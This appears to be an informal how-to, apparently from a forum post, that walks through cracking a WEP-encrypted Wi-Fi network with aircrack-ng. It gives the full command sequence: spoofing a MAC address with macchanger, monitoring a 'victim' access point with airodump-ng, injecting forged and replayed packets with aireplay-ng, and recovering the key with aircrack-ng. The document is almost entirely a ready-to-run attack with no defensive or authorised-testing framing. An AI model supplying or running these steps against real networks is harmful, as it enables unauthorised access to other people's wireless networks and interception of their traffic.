*open up 3 shell konsoles by clicking the little black box next to the start button. * The first thing were going to do is stop the device aka ethernet card airmon-ng stop wlan0 * Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig ifconfig wlan0 down * Ok now just to make things simpler, so we don't have to hunt down what our Mac address is macchanger --mac 00:11:22:33:44:55 (device) * Now were going to start the wireless card *make it listen for AP's airmon-ng start wlan0 * Lets start seeing what AP's are there airodump-ng wlan0 * After you see all the AP's execute the following command to stop it and copy the bssid CTRL+C Copy bssid of victom * Now on to the victim's AP (were listening in for authentication packets airodump-ng -c 6 -w Exidous --bssid (Bssid) wlan0 * Lets get on with making more Data, and start the injection process aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0 * Clientless Gets a packet aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0 press y to use the packet. or * Now were going to inject the router ***this sometimes takes a while to actually inject! aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0 * On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV's for 128 bit encryption aircrack-ng -n 64 --bssid (bssid) exidous-01.cap